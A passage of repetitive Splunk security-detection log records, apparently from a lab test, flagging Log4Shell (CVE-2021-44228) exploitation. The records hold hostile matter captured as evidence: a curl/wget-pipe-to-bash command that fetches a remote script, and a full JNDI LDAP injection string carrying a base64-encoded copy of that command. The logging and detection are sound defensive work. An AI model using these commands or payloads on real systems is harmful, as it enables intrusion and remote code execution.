CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647253, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 13", annotations._all="DE.CM", annotations._all="T1190", annotations._all="Command and Control", annotations._all="T1059", annotations._all="CIS 12", annotations._all="Source:Endpoint", annotations._all="DE.AE", annotations._all="CVE-2021-44228", annotations._all="Actions on Objectives", annotations._all="Log4Shell CVE-2021-44228", annotations._all="PR.PT", annotations._all="Stage:Initial Access", annotations._all="PR.DS", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642647252, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Reconnaissance", annotations._all="DE.CM", annotations._all="CVE-2021-44228", annotations._all="CIS 16", annotations._all="CIS 5", annotations._all="T1190", annotations._all="CIS 3", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="Exploitation", annotations._all="Stage:Execution", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642647253, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 13", annotations._all="DE.CM", annotations._all="T1190", annotations._all="Command and Control", annotations._all="T1059", annotations._all="CIS 12", annotations._all="Source:Endpoint", annotations._all="DE.AE", annotations._all="CVE-2021-44228", annotations._all="Actions on Objectives", annotations._all="Log4Shell CVE-2021-44228", annotations._all="PR.PT", annotations._all="Stage:Initial Access", annotations._all="PR.DS", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642647252, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Reconnaissance", annotations._all="DE.CM", annotations._all="CVE-2021-44228", annotations._all="CIS 16", annotations._all="CIS 5", annotations._all="T1190", annotations._all="CIS 3", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="Exploitation", annotations._all="Stage:Execution", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to 